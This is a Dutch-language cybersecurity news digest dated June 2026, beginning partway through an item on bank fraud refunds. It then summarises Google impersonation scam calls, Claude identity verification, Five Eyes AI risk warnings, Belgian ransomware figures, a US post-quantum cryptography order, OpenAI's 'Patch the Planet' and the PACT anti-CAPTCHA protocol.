Het zo snel mogelijk melden van een vermoeden van oplichting bij de bank is van groot belang, niet alleen om verdere schade te beperken, maar ook in het kader van eventuele terugbetalingen. De wet stelt dat banken slachtoffers van niet-toegestane betalingen in veel gevallen moeten terugbetalen, een principe dat onlangs nog werd bekrachtigd door een Antwerpse rechter. Banken houden zich hier echter niet altijd aan. De terugbetalingsplicht geldt enkel bij niet-toegestane betalingen; indien een klant zelf geld heeft overgemaakt aan een oplichter, blijft deze zelf verantwoordelijk. Bovendien mag de klant niet "grof nalatig" zijn geweest, zoals het bewaren van een pincode en bankkaart samen in de portefeuille. Zelfs bij grove nalatigheid is de bank echter verplicht om bedragen te vergoeden die na de initiële melding van een niet-toegestane betaling alsnog van de rekening verdwijnen. De bestaande telefoonnummers van de afzonderlijke fraudediensten per bank blijven overigens gewoon bestaan.

 

Bron: Febelfin | Bron 2: fraudstop.be

23 juni 2026 | Fraudehelpdesk waarschuwt voor nep telefoontjes uit naam van Google

De Fraudehelpdesk heeft op maandag 22 juni 2026 een waarschuwing doen uitgaan voor misleidende telefoontjes die worden gepleegd uit naam van de helpdesk van Google. Bij deze oplichtingspraktijk wordt een gespooft telefoonnummer gebruikt, waardoor de oproep afkomstig lijkt te zijn van een legitieme Google-bron. De bellers beweren dat er problemen zijn met het account van de gebelde persoon, zoals een vermeende hack. Een zorgwekkend aspect dat de Fraudehelpdesk benadrukt, is dat oplichters in bepaalde gevallen al over veel persoonlijke gegevens van de melder beschikken. Dit kan erop duiden dat het account van Google van de melder reeds gecompromitteerd is, wat de nep telefoontjes een schijn van betrouwbaarheid geeft.

Slachtoffers van deze oplichting krijgen van de fraudeurs instructies om hun account te "beveiligen" via een reeks voorgeschreven stappen. Deze stappen omvatten vaak het verzoek om een twee-factor authenticatie (2FA) code door te geven of om wachtwoorden te wijzigen. Het uiteindelijke doel van deze manoeuvres is voor de oplichters om ongeautoriseerde toegang te verkrijgen tot het account van de gebelde persoon. Specifiek merkt de Fraudehelpdesk op dat bij een aantal gemelde gevallen de oplichter via het account van Google toegang wilde krijgen tot het crypto account van de melder. De Fraudehelpdesk sluit niet uit dat er ook andere redenen zijn waarom de oplichters toegang tot een account van Google willen bemachtigen.

Om zich te beschermen tegen deze vorm van fraude, adviseert de Fraudehelpdesk iedereen die een telefoontje ontvangt dat beweert van Google afkomstig te zijn, om onmiddellijk op te hangen. Het is cruciaal om vervolgens zelfstandig de officiële contactgegevens van Google op te zoeken en via die weg contact op te nemen met het bedrijf, mocht men daadwerkelijk vermoeden dat er een probleem is met het eigen account. Deze voorzorgsmaatregel voorkomt dat slachtoffers gevoelige informatie delen met oplichters en helpt hen te beschermen tegen verdere compromittering van hun digitale identiteit en financiële activa.

 

Bron: Fraudehelpdesk

23 juni 2026 | Anthropic introduceert identiteitsverificatie voor chatbot Claude

Anthropic, de ontwikkelaar van de populaire chatbot Claude, heeft aangekondigd identiteitsverificatie te zullen uitrollen voor zijn dienst. Voor deze identiteitscontrole maakt het bedrijf gebruik van Persona Identities, een leverancier die eerder dit jaar in het nieuws kwam vanwege een beveiligingsincident waarbij onderzoekers toegang kregen tot een testomgeving.

Gebruikers van Claude die hun identiteit willen verifiëren, moeten een geldig legitimatiebewijs vasthouden en vervolgens een live selfie maken. Anthropic benadrukt dat kopieën, screenshots, scans of foto's van een foto niet zullen worden geaccepteerd, evenals digitale of mobiele identiteitsbewijzen. Het bedrijf stelt dat de verzamelde gegevens uitsluitend worden gebruikt om de identiteit van de gebruiker te bevestigen en om te voldoen aan juridische en veiligheidsverplichtingen. Expliciet wordt vermeld dat de identiteitsdata niet zullen worden ingezet voor het trainen van de AI modellen van Anthropic.

De aankondiging heeft geleid tot honderden reacties op platforms zoals Hacker News en Reddit. Onder deze reacties bevonden zich ook Nederlanders die hun zorgen uiten over de compatibiliteit van de dienst van Persona Identities met de Nederlandse wetgeving. De Rijksoverheid geeft aan dat slechts een beperkt aantal organisaties, zoals werkgevers en banken, een kopie van een identiteitsbewijs mogen maken, en dat burgers niet verplicht zijn dit aan andere partijen te verstrekken. De Autoriteit Persoonsgegevens voegt hieraan toe dat een organisatie wettelijk verplicht kan zijn om een identiteit te controleren, wat soms het opvragen of maken van een volledige kopie van een ID-bewijs kan omvatten.

Critici signaleren tevens mogelijke overtredingen van de Algemene Verordening Gegevensbescherming (AVG). Er worden zorgen geuit over tegenstrijdige verklaringen in de privacyverklaringen van Anthropic, waarbij enerzijds wordt gesteld dat data niet voor modeltraining wordt gebruikt, terwijl de privacyverklaring hier mogelijk wel in voorziet. Dit soort inconsistenties kan volgens kenners leiden tot handhaving en onderzoek door toezichthouders. De identiteitscontroles voor Claude-gebruikers zullen vanaf 8 juli worden ingevoerd.

 

Bron: Anthropic | Bron 2: fortune.com | Bron 3: alternativeto.net

23 juni 2026 | Signal-voorzitter waarschuwt voor AI-integratie in besturingssystemen

Meredith Whittaker, voorzitter van de Signal Foundation, benadrukt dat mensen zich moeten realiseren dat chatbots met kunstmatige intelligentie (AI), zoals ChatGPT, geen vrienden zijn en ook geen wezens met bewustzijn of empathische gesprekspartners. Deze waarschuwing deed zij tijdens een interview met Bloomberg, waarin zij haar zorgen uitte over de privacyimplicaties van AI.

Whittaker legde uit dat hoewel gebruikers hun chats met AI-chatbots kunnen verwijderen en kunnen aangeven dat zij niet willen dat gesprekken worden gedeeld, de uiteindelijke controle over deze gegevens bij de aanbieder van de dienst ligt. Dit vormt een fundamenteel privacyrisico, aangezien gebruikers geen absolute zekerheid hebben over het lot van hun interacties met AI-systemen.

Een andere belangrijke zorg die Whittaker aanstipt, is de opkomst van agents met AI. Deze agents zijn ontworpen om autonoom diverse taken voor gebruikers uit te voeren. Om dit te bewerkstelligen, vereisen dergelijke agents toegang tot gevoelige informatie, waaronder inloggegevens, creditcardgegevens en de inhoud van apps voor chat zoals Signal. Whittaker stelt dat een dergelijke integratie binnen de context van Signal neer zou komen op een backdoor.

De voorzitter van de Signal Foundation vreest dat grote technologiebedrijven als Apple, Google en Microsoft in de toekomst dergelijke agents met AI zullen implementeren in hun respectievelijke besturingssystemen (iOS, Android en Windows). Een dergelgelijke implementatie zou volgens haar de privacybelofte van Signal en andere apps voor chat aanzienlijk kunnen ondermijnen.

Whittaker beschrijft de huidige ontwikkelingen als een "stille maar ingrijpende verandering". Zij wijst erop dat deze drie bedrijven een dominante controle hebben over de belangrijkste besturingssystemen wereldwijd. Deze positie stelt hen in staat beslissingen te nemen die de gezamenlijke cybersecurity fundamenteel kunnen schaden, de keuzevrijheid van gebruikers ten aanzien van privacy kunnen wegnemen en ontwikkelaars van alternatieve diensten volledig kunnen belemmeren. Haar analyse benadrukt de structurele macht die deze technologiegiganten bezitten en de potentiële impact daarvan op de digitale veiligheid en privacy van miljoenen gebruikers.

 

Bron: Signal | Bron 2: newyorker.com

23 juni 2026 | Five Eyes waarschuwt voor snelle transformatie cyberrisico door AI

De inlichtingendiensten van de Five Eyes-alliantie, bestaande uit Australië, Canada, Nieuw-Zeeland, het Verenigd Koninkrijk en de Verenigde Staten, roepen organisaties op om onmiddellijk actie te ondernemen tegen de snel veranderende cyberrisico's als gevolg van de opkomst van kunstmatige intelligentie (AI). De leiders van deze cybersecurity-agentschappen benadrukken dat AI de snelheid, schaal en verfijning van cyberdreigingen versnelt, terwijl het tegelijkertijd krachtige tools biedt om de cyberverdediging te versterken.

De agencies waarschuwen dat de transformatie van offensieve en defensieve cybermogelijkheden door grensverleggende AI modellen niet jaren, maar maanden zal duren. In deze context is cyberweerbaarheid essentieel voor het waarborgen van bedrijfscontinuïteit, marktvertrouwen en langetermijnwaarde. Leiders worden dringend geadviseerd om risico's, paraatheid en verantwoordelijkheid te begrijpen en te beoordelen, fundamentele cybersecurity-praktijken en controles te prioriteren, cyberleiders te voorzien van autoriteit en middelen, en actief betrokken te blijven bij de evolutie van dreigingen en richtlijnen. Succes hangt af van het correct uitvoeren van de basisprincipes, snel handelen en het integreren van cybersecurity in de kernbedrijfsstrategie. Organisaties die hierin achterblijven, zullen geconfronteerd worden met groeiende operationele en strategische nadelen.

AI is volgens de Five Eyes-leiders geen toekomstige overweging; het is al een realiteit. Het verlaagt de drempel voor kwaadwillende actoren en verhoogt de snelheid en complexiteit van aanvallen, waardoor de periode tussen de ontdekking en de exploitatie van een kwetsbaarheid steeds korter wordt. Tegelijkertijd biedt AI robuuste middelen om de verdediging te versterken. Een organisatiebrede en maatschappijbrede respons is noodzakelijk, aangezien cyberrisico niet langer als een puur technisch probleem kan worden behandeld. Het is een kernbedrijfsrisico en een verantwoordelijkheid van het leiderschap. Besturen en directies moeten ervoor zorgen dat cyberweerbaarheid aanwezig is en onder druk functioneert.

Specifieke praktische acties die organisaties nu dringend moeten nemen, omvatten het verminderen van het aanvalsoppervlak door onnodige systeemtoegang en externe connectiviteit te beperken. Ook het versnellen van patchingprocessen is cruciaal, gezien de verkorte tijd tussen de ontdekking en de exploitatie van kwetsbaarheden door AI. Verder moeten verouderde systemen, die gemakkelijke doelwitten vormen, worden aangepakt. Het versterken van identiteits- en toegangscontroles door de toegang tot kritieke systemen te beperken, sterke authenticatie af te dwingen en machtigingen regelmatig te controleren, is eveneens van groot belang. Tot slot is het voorbereiden op incidenten voordat ze plaatsvinden essentieel, door responsplannen te testen, teams te trainen en uit te gaan van het feit dat inbreuken zullen plaatsvinden, met een focus op snelle beheersing en herstel.

Aanvallers gebruiken AI al om sneller en effectiever te opereren. Verdedigers moeten hetzelfde doen. Organisaties die AI tools integreren in hun beveiligingsoperaties kunnen kwetsbaarheden eerder detecteren, softwarekwaliteit verbeteren, ongebruikelijk gedrag monitoren en sneller reageren op incidenten, waardoor zowel de kosten als de impact van incidenten worden verminderd. De snelle ontwikkeling van grensverleggende AI betekent dat aannames over cyberrisico in maanden, niet in jaren, verouderd kunnen raken. De Five Eyes-partners roepen leiders in de hele industrie, inclusief leveranciers, op om nu te handelen en samen te werken om onze mensen te beschermen en onze toekomst te beveiligen.

 

Bron: NCSC

23 juni 2026 | Europese ID-wallet niet verplicht voor online leeftijdsverificatie

De Europese ID wallet zal niet verplicht worden gesteld voor online leeftijdsverificatie. Dit standpunt is kenbaar gemaakt door staatssecretaris Aerdts voor Digitale Economie. Tevens is het kabinet geen voorstander van leeftijdsverificatie die op het niveau van het besturingssysteem wordt geregeld. Deze mededelingen volgen op vragen die verschillende leden van de vaste commissie Digitale Zaken van de Tweede Kamer aan Aerdts hadden gesteld over de Europese plannen voor de invoering van online leeftijdsverificatie.

Eerder had het kabinet al aangegeven voorstander te zijn van een Europese minimumleeftijd van 15 jaar voor sociale media die als "onvoldoende veilig" worden bestempeld. In dit scenario zouden alle gebruikers van dergelijke platforms hun leeftijd moeten laten controleren. De Europese Commissie heeft inmiddels een whitelabel app ontwikkeld voor online leeftijdsverificatie, die websites in de toekomst kunnen gebruiken voor deze controles.

D66-fractieleden hadden specifiek vragen gesteld over de mogelijke inzet van de Europese Digitale Identiteits (EDI) wallet voor leeftijdsverificatie. De staatssecretaris bevestigde dat de inzet van EDI wallets een van de overwogen mogelijkheden is. Daarbij benadrukte zij echter het belang van vrijwillig gebruik: "Er zullen daarom ook alternatieven moeten zijn voor mensen die geen EDI wallet willen gebruiken," aldus Aerdts.

Ook op vragen van de PRO-fractie herhaalde de staatssecretaris dat het gebruik van de Europese ID wallet vrijwillig blijft. Burgers die de EDI wallet willen gebruiken, zouden hiermee een bewijs kunnen delen met dienstverleners dat zij de benodigde leeftijd hebben bereikt, zonder dat hun specifieke leeftijd of andere persoonlijke gegevens worden gedeeld. De nadruk blijft liggen op de vrijwilligheid en de noodzaak van alternatieve methoden.

De SGP-fractie vroeg het kabinet om ervoor te waken dat zorgen over de invloed van sociale media op jongeren niet worden misbruikt om de Europese Digitale Identiteit als een onvermijdelijke oplossing te presenteren. De staatssecretaris bevestigde dat het kabinet zich zal blijven inzetten voor vrijwilligheid en dat de Europese Digitale Identiteit niet als enig middel voor leeftijdsverificatie gehanteerd zal worden. In plaats daarvan zal er gekeken worden naar bestaande mogelijkheden, zoals leeftijdsverificatie op het niveau van de appstore, met aandacht voor privacywaarborgen en de rechten van ouders.

Europese wetgeving garandeert dat het gebruik van een EDI wallet vrijwillig is en dat de toegang tot publieke en private diensten niet mag worden beperkt of belemmerd voor burgers die ervoor kiezen geen EDI wallet te gebruiken. Dit betekent dat onlinediensten die leeftijdsverificatie vereisen, verplicht zijn om naast EDI wallets ook andere geschikte instrumenten voor leeftijdsverificatie toe te staan.

Wat betreft leeftijdsverificatie op het niveau van het besturingssysteem, gaf de SGP-fractie aan dat zij wilde dat het kabinet zich hiervoor zou inzetten. De staatssecretaris liet echter weten dat het kabinet hier geen voorstander van is, en providers evenmin. Een dergelijk systeem zou de verantwoordelijkheid voor veilige digitale diensten verleggen van ontwikkelaars naar providers en zou bovendien leiden tot een sterkere afhankelijkheid van een zeer beperkt aantal providers, iets waar het kabinet niet naar streeft.

 

Bron: Europese Commissie | Bron 2: tweedekamer.nl

23 juni 2026 | België kampt met gemiddeld 22 ransomware aanvallen per dag

België wordt dagelijks geconfronteerd met gemiddeld 22 ransomware aanvallen, zo blijkt uit cijfers van het Centrum voor Cybersecurity België (CCB). Deze statistieken werden gedeeld door pentester Youssef Bey van Cresco tijdens de VanRoey Cybersecurity Day, waar hij benadrukte dat cyberaanvallen de norm zijn geworden. Hoewel niet elke aanvalspoging succesvol is, wordt een aanzienlijk deel verijdeld. Desondanks is 42 procent van de Belgische kmo's reeds getroffen door een cyberaanval, en heeft 30 procent van de bedrijven nog geen enkele cyberstrategie geïmplementeerd. In 2025 registreerde het CCB 121 bekende ransomware incidenten.

De sectoren die het zwaarst getroffen zijn, zijn ICT (24 procent), handel (20 procent) en industrie (13 procent). De meest voorkomende methoden die aanvallers hanteren, zijn het overnemen van accounts (38 procent) en het misbruiken van kwetsbaarheden (33 procent).

De eigen pentest cijfers van Cresco tonen een confronterend beeld. Bij 95 procent van de uitgevoerde pentests worden minstens twintig kwetsbaarheden ontdekt. In 55 procent van deze gevallen betreft het kritieke problemen die het Cresco team in staat stelden om systemen tot op domeinniveau over te nemen. In 71 procent van de succesvolle overnames lag een verkeerde configuratie aan de basis. Youssef Bey merkt op dat er in alle pentesten die Cresco uitvoert, altijd wel iets naar boven komt, en dat vaak het rechtzetten van configuratiefouten volstaat, zonder dat nieuwe oplossingen nodig zijn.

De meest voorkomende aanval vormen blijven phishing, ransomware, wachtwoord diefstal, malware, drive-by downloads en social engineering. Vooral de phishing cijfers zijn zorgwekkend, bij een goed georkestreerde, gepersonaliseerde campagne opent 46 procent van de ontvangers de mail en klikt 60 procent door. Van degenen die doorklikken, geeft 74 procent vervolgens effectief inloggegevens in, terwijl slechts 4 procent de kwaadaardige mail rapporteert. Bey benadrukt dat aanvallers slechts "één iemand nodig hebben" om succesvol te zijn. Het wordt steeds moeilijker om phishing te herkennen, mede door de inzet van kunstmatige intelligentie (AI) die foutloze en perfect gerichte e-mails mogelijk maakt.

Wanneer organisaties slachtoffer worden, komen zij terecht in een geprofessionaliseerd ransomware ecosysteem. Losgeld eisen beginnen doorgaans rond de vijf tot tien procent van de omzet, al kunnen deze bedragen via onderhandeling aanzienlijk zakken. Het advies van Bey blijft consistent, wie niet hoeft te betalen, betaalt beter nooit. Voor bedrijven die aan hun cyberweerbaarheid willen werken, wijst Cresco op de NIS2 verplichtingen en de CCB fundamentals. Daarnaast adviseert Cresco om gebruik te maken van gesubsidieerde trajecten via VLAIO, waarbij pentests en compliance oefeningen tot 50 procent gesubsidieerd kunnen worden.

 

Bron: IT Daily

23 juni 2026 | Nederlandse organisaties vooral gehackt door achterstallige basisbeveiliging

Uit het Trend Report 2026 van het Nederlandse cyberbeveiligingsbedrijf Hunt & Hackett blijkt dat Nederlandse organisaties vaker slachtoffer worden van aanvallen door gebrekkige basisbeveiliging dan door zeer geavanceerde dreigingen. Het rapport, dat is gebaseerd op ruim 54.000 beveiligingsonderzoeken die in 2025 zijn uitgevoerd, concludeert dat de meeste cyberincidenten niet het gevolg zijn van onbekende zerodaylekken.

De belangrijkste oorzaken van succesvolle aanvallen zijn volgens de onderzoekers achterstallig onderhoud van systemen, zwakke monitoring van netwerken en systemen, en onvoldoende beveiliging van identiteiten en toegang. Deze fundamentele tekortkomingen in de beveiliging zijn zaken die organisaties zelf kunnen en moeten verhelpen. De bevindingen benadrukken het belang van een solide basis op het gebied van cyberbeveiliging, alvorens te focussen op de meest complexe dreigingen. Het rapport suggereert dat veel incidenten vermijdbaar zijn met een betere implementatie van standaard beveiligingspraktijken.

 

Bron: Hunt & Hackett

24 juni 2026 | Internet Society Foundation opent subsidieoproep voor cybersecurity maatschappelijk middenveld

De Internet Society Foundation heeft recentelijk een wereldwijde oproep gelanceerd voor het indienen van aanvragen voor haar Common Good Cyber Fund (CGCF). Dit initiatief, dat zich uitstrekt over meerdere jaren, is specifiek ontworpen om financiële ondersteuning te bieden aan non-profitorganisaties. Het primaire doel van deze financiering is het versterken van de cyberbeveiliging voor het maatschappelijk middenveld en het bevorderen van de algehele kerncyberbeveiliging van het internet.

De mogelijkheid om aanvragen in te dienen staat open van 23 juni 2026 tot en met 4 augustus 2026. Gedurende deze periode worden non-profitorganisaties van over de hele wereld aangemoedigd om hun voorstellen in te dienen. De nadruk ligt hierbij op projecten en initiatieven die direct bijdragen aan het beschermen van civiele maatschappelijke entiteiten tegen digitale dreigingen en die de robuustheid van de internetinfrastructuur ten goede komen. Het fonds erkent de cruciale rol die deze organisaties spelen in het handhaven van een veilige en open online omgeving. Door middel van de Common Good Cyber Fund beoogt de Internet Society Foundation een significante bijdrage te leveren aan de digitale weerbaarheid van de maatschappij als geheel.

 

Bron: Deze informatie is afkomstig van een anonieme tip aan Cybercrimeinfo

24 juni 2026 | Trump stelt 2030 deadline voor federale post-kwantum cryptografie migratie

President Trump heeft op 22 juni een uitvoeringsbevel ondertekend dat federale agentschappen harde deadlines oplegt voor de migratie van hoogwaardige activa en systemen met hoge impact naar post-kwantum cryptografie (PQC). Dit bevel, aangeduid als EO 14409, versnelt de bestaande tijdlijn aanzienlijk, die eerder op 2035 was gesteld door het National Security Memorandum 10 uit 2022. De nieuwe deadlines trekken de overheidsbrede PQC-tijdlijn met vier tot vijf jaar naar voren.

De belangrijkste deadline is gesteld op 31 december 2030 voor de migratie van sleuteletablissement. Voor digitale handtekeningen is de deadline vastgesteld op 31 december 2031. Nationale veiligheidssystemen volgen een apart traject. De urgentie van deze migratie komt voort uit het "harvest now, decrypt later" risico. Dit houdt in dat tegenstanders nu versleutelde Amerikaanse data kunnen verzamelen en deze later kunnen ontcijferen zodra er een grootschalige kwantumcomputer beschikbaar is. Het uitvoeringsbevel beschrijft dit risico expliciet.

De gestelde deadlines zijn in lijn met de standaarden die het National Institute of Standards and Technology (NIST) in augustus 2024 heeft gefinaliseerd. Voor sleuteletablissement wordt FIPS 203 gebruikt, het ML-KEM-algoritme dat voorheen bekend stond als CRYSTALS-Kyber. Digitale handtekeningen maken gebruik van FIPS 204 en 205, respectievelijk ML-DSA en SLH-DSA. Deze standaarden zijn al bijna twee jaar beschikbaar, en het bevel transformeert ze nu in een verplicht schema met consequenties.

De nabije termijn vereist snelle actie van de agentschappen. Binnen 30 dagen moet elk hoofd van een agentschap een PQC-migratiehoofd aanwijzen. Deze persoon rapporteert aan de CIO van het agentschap en is verantwoordelijk voor de cryptografische inventaris en het migratieplan. Binnen 90 dagen zal het Office of Management and Budget (OMB) richtlijnen uitvaardigen die agentschappen verplichten hun inventarissen van hoogwaardige activa en systemen met hoge impact te beoordelen, de migratie te plannen en dat plan in te dienen. NIST zal bovendien een pilotmigratie uitvoeren op een deel van zijn eigen systemen, die uiterlijk 31 december 2027 moet zijn afgerond.

Het uitvoeringsbevel reikt verder dan alleen federale netwerken. De Federal Acquisition Regulatory Council (FAR Council) krijgt 180 dagen de tijd om een regel voor te stellen. Deze regel zou "gedekte aannemers" verplichten om uiterlijk 31 december 2030 te voldoen aan de FIPS-standaarden van NIST, inclusief de PQC-algoritmen. Een tweede voorgestelde regel, die binnen 270 dagen moet worden ingediend, zou cryptografische tekortkomingen opnemen in de kwetsbaarheid openbaarmakingsprogramma's van aannemers, inclusief tests op ontbrekende encryptie en niet-FIPS-algoritmen. Sector Risk Management Agencies en CISA krijgen de opdracht om kritieke infrastructuurbeheerders te helpen bij het opstellen van hun eigen migratieplannen, hoewel dit deel van het bevel assistentie betreft en geen mandaat.

Een cruciaal aspect is de inventarisatie. Binnen 270 dagen moeten CISA en NIST de minimale elementen publiceren voor een cryptografische 'bill of materials' (CBOM), een machinaal leesbare lijst van de cryptografische activa in hardware of software. Dit vormt de basis voor 'crypto-agility', aangezien het onmogelijk is om zwakke algoritmen tijdig te vervangen als niet bekend is waar ze zich bevinden.

Voor federale teams en hun leveranciers betekent dit dat het werk direct begint met de inventarisatie. Zij moeten elke plaats identificeren waar sleuteluitwisseling en handtekeningen plaatsvinden, aangeven wat niet voldoet aan NIST PQC, en de vervanging plannen tegen de deadlines van 2030 en 2031. Aannemers moeten de FAR-clausule en een compliance-eis voor 2030 verwachten zodra de regel van kracht wordt. De standaarden en de deadlines zijn nu definitief. De belangrijkste taak voor bijna iedereen is het in kaart brengen van de gebruikte cryptografie en de locaties ervan.

Een gelijktijdig ondertekend bevel, getiteld "Ushering in the Next Frontier of Quantum Innovation", richt zich op de andere kant van de vergelijking: het bouwen van de kwantumcomputers die de migratie in de eerste plaats urgent maken. De precieze handhaving van deze maatregelen moet nog worden uitgewerkt; de richtlijnen van OMB binnen 90 dagen en de FAR-regels zullen bepalen of 2030 en 2031 daadwerkelijk leiden tot inkoopdruk of slechts tot een nieuwe federale migratiedoelstelling die vertraging oploopt zodra het zware werk begint.

 

Bron: White House | Bron 2: nist.gov

24 juni 2026 | Kabinet werkt aan handelingskader voor slachtoffers van grote datalekken

Het Nederlandse kabinet ontwikkelt, in samenwerking met experts en toezichthouders, een handelingskader voor slachtoffers van omvangrijke datalekken. Dit kader moet duidelijkheid scheppen over de informatie die getroffen organisaties aan de betrokken personen moeten verstrekken. De definitieve publicatiedatum van het handelingskader is nog niet bekend.

De aanleiding voor dit initiatief was een motie die in maart werd ingediend door de Tweede Kamerfracties van VVD, CDA, ChristenUnie, D66 en JA21. Deze motie, die unaniem werd aangenomen, volgde op het grootschalige datalek bij Odido, waarbij gegevens van ruim zes miljoen mensen werden gestolen. De motie riep het kabinet op om een kader op te stellen dat slachtoffers informeert over wat zij moeten weten en welke stappen zij kunnen ondernemen na een datalek.

Staatssecretaris Van Bruggen van Justitie en Veiligheid heeft in een recente brief aan de Tweede Kamer bevestigd dat er naar aanleiding van de motie diverse acties zijn ondernomen, waaronder gesprekken met experts. Van Bruggen benadrukt dat organisaties slachtoffers van een groot datalek zo snel en duidelijk mogelijk van betrouwbare en, indien mogelijk, gepersonaliseerde informatie moeten voorzien. Slachtoffers hebben het recht te weten wat er is gebeurd, welke gegevens zijn gelekt, wat de potentiële gevolgen zijn en welke maatregelen zij zelf kunnen nemen om risico’s te beperken.

Organisaties die getroffen zijn door een groot datalek moeten deze informatie actief aan de slachtoffers verstrekken. Het handelingskader dat momenteel wordt ontwikkeld, zal specificeren welke informatie minimaal moet worden gedeeld, voorbeeldteksten bevatten en handelingsperspectieven bieden voor verschillende risicoprofielen. Bovendien moeten getroffen organisaties inzicht geven in de acties die zij hebben ondernomen en de beveiligingsmaatregelen die zij doorvoeren. Ook moet slachtoffers worden uitgelegd welke maatregelen zij zelf kunnen nemen en wat de mogelijkheden zijn in het geval van opgelopen schade door het datalek.

Het streven is gericht op een spoedige afronding van het handelingskader, in overleg met relevante instanties, betrokken toezichthouders en vertegenwoordigers van het bedrijfsleven. Deze informatie zal vervolgens door de Autoriteit Persoonsgegevens (AP), als onderdeel van of naar aanleiding van de meldingsprocedure voor datalekken, aan organisaties worden aangeboden en op de websites van de betrokken instanties beschikbaar worden gesteld. De Tweede Kamer zal later dit jaar verder worden geïnformeerd over de voortgang.

 

Bron: Kabinet werkt aan handelingskader voor

24 juni 2026 | Werkplek Nederlandse ambtenaren stapsgewijs autonoom

De werkplek van rijksambtenaren, die momenteel deels of geheel in de cloud draait en gebaseerd is op componenten van Microsoft, zal stapsgewijs worden vervangen door autonome onderdelen. Dit heeft minister Heerma van Binnenlandse Zaken bekendgemaakt in antwoord op vragen van de vaste commissie voor Digitale Zaken van de Tweede Kamer. De vragen volgden op een verantwoordingsonderzoek dat de Algemene Rekenkamer bij het ministerie uitvoerde.

In het onderzoek van de Algemene Rekenkamer kwamen de digitale werkplekken ter sprake waarvan 58.000 rijksambtenaren gebruikmaken. De Rekenkamer benadrukte de noodzaak om op de lange termijn aandacht te besteden aan digitale soevereiniteit bij de keuze voor digitale werkplekken. De Tweede Kamercommissie wilde daarom van de minister weten hoe digitale soevereiniteit wordt meegewogen bij de selectie en inrichting van deze werkplekken binnen de Rijksoverheid.

Minister Heerma stelde dat digitale autonomie en de inzet van open source veel aandacht krijgen binnen de Rijksoverheid, ook bij de beslissingen over de digitale werkplekken. Hij gaf aan dat de overheid sinds 2020 een 'Open, tenzij-beleid' hanteert, waarbij software van de overheid zoveel mogelijk open source moet zijn. Als gevolg hiervan worden de huidige componenten van Microsoft geleidelijk vervangen door autonome alternatieven.

Aanvullend meldde Heerma dat DICTU en SSC-ICT, twee overheidsinstanties die ICT-diensten leveren aan de overheid, samen met DUO (Dienst Uitvoering Onderwijs) de opdracht hebben gekregen om een soevereine digitale werkplek te ontwikkelen. De minister heeft de ambitie om volgend jaar de eerste testgebruikers over te zetten naar deze nieuwe, soevereine digitale werkplek.

 

Bron: Ministerie van Binnenlandse Zaken | Bron 2: minbzk.github.io | Bron 3: forumstandaardisatie.nl

24 juni 2026 | OpenAI lanceert 'Patch the Planet' voor AI-ondersteund patchen van opensource-lekken

OpenAI heeft een nieuw initiatief gelanceerd genaamd 'Patch the Planet', gericht op het inzetten van kunstmatige intelligentie (AI) voor het identificeren en verhelpen van kwetsbaarheden in opensourceprojecten. Voor dit project werkt de leverancier van AI samen met cybersecuritybedrijf Trail of Bits. Volgens OpenAI stelt AI hen in staat om kwetsbaarheden sneller en in grotere aantallen op te sporen, wat resulteert in een toename van bugmeldingen voor de maintainers van opensourceprojecten. Dit vereist dat zij binnen dezelfde tijdsbestekken en met dezelfde middelen meer patches moeten ontwikkelen.

Het primaire doel van 'Patch the Planet' is om security engineers te faciliteren bij het analyseren van de door tools van AI van OpenAI gevonden kwetsbaarheden, voordat deze meldingen naar de maintainers worden verstuurd. Na deze analyse werken de engineers nauw samen met de projectteams om de benodigde patches te ontwikkelen en grondig te testen. Een essentieel onderdeel van het initiatief is de opzet van een 'reusable workflow', die opensource-ontwikkelaars in staat stelt om, na de initiële patch, hun beveiliging continu te verbeteren. Dit stelt hen in staat om, op basis van reeds bekende en gerapporteerde kwetsbaarheden, varianten in hun eigen codebase op te sporen.

Trail of Bits benadrukt dat geavanceerde modellen zoals GPT-5.5-Cyber een enorme hoeveelheid bugmeldingen genereren. Dit kan de reeds overbelaste maintainers verder belasten, omdat zij het onderscheid moeten maken tussen echte kwetsbaarheden en aannemelijk ogende valse positieven. 'Patch the Planet' pakt dit probleem aan door experts van Trail of Bits de bugmeldingen te laten coördineren en prioriteren, waarna zij samen met de maintainers de code herstellen en verder beveiligen.

In de eerste fase zal 'Patch the Planet' zich richten op negentien specifieke opensourceprojecten. Hiertoe behoren onder andere cURL, NATS Server, pyca/cryptography, Sigstore, aiohttp, het Go project, freenginx, Python en python.org. Deze projecten zijn geselecteerd omdat zij op grote schaal worden toegepast in diverse downstream producten en diensten. OpenAI is van plan om het initiatief in de toekomst uit te breiden met meer opensourceprojecten, en geïnteresseerde projecten kunnen zich reeds aanmelden.

 

Bron: OpenAI | Bron 2: embeddedor.com | Bron 3: lwn.net

24 juni 2026 | Grote webbrowsers bundelen krachten tegen CAPTCHA’s met nieuw PACT-protocol

Cloudflare heeft in samenwerking met Mozilla, Google en Microsoft een nieuw protocol gelanceerd dat als doel heeft de betrouwbaarheid van webverkeer aan te tonen zonder de gebruiker te identificeren of te volgen. De betrokken technische partijen zullen gezamenlijk het protocol Private Access Control Tokens, kortweg PACT, ontwikkelen. Dit initiatief heeft een tweeledig doel: enerzijds het elimineren van de hinderlijke CAPTCHA-controles voor internetgebruikers, en anderzijds het overbodig maken van verborgen fingerprinting-praktijken.

Het onderliggende concept van PACT is relatief eenvoudig. Een website die een gebruiker reeds kent, kan een anoniem token uitgeven. Dit token functioneert als een soort digitale "munt" die bevestigt dat de gebruiker betrouwbaar is, vergelijkbaar met een aanbeveling van een bekende. De webbrowser van de gebruiker kan dit token vervolgens presenteren aan andere websites om aan te tonen dat er een menselijke gebruiker aan de knoppen zit, en niet een geautomatiseerd script of een bot. Het cruciale aspect hiervan is dat deze tokens de ontvangende websites niet in staat stellen om de gebruiker te volgen of diens surfgedrag te herleiden. De wetenschap dat het om een mens gaat, is voldoende om technische drempels weg te nemen.

De betrokkenheid van grote spelers zoals Google Chrome en Shopify vergroot de groep van 'bekende gebruikers' aanzienlijk, wat de potentiële adoptie en effectiviteit van het protocol ten goede komt. De PACT-technologie bouwt voort op Privacy Pass, een protocol dat Cloudflare al sinds 2017 gebruikt en dat reeds is vastgelegd als een RFC (Request for Comments). Apple heeft bovendien al jarenlang een vergelijkbaar systeem met Private Access Tokens in gebruik. De noodzaak voor een dergelijk protocol wordt onderstreept door recente cijfers van Cloudflare, waaruit blijkt dat websites momenteel meer bezoekersverkeer ontvangen van bots met kunstmatige intelligentie dan van menselijke gebruikers, wat de urgentie van robuuste en privacyvriendelijke verificatiemechanismen benadrukt.

 

Bron: Cloudflare | Bron 2: datatracker.ietf.org | Bron 3: unsplash.com

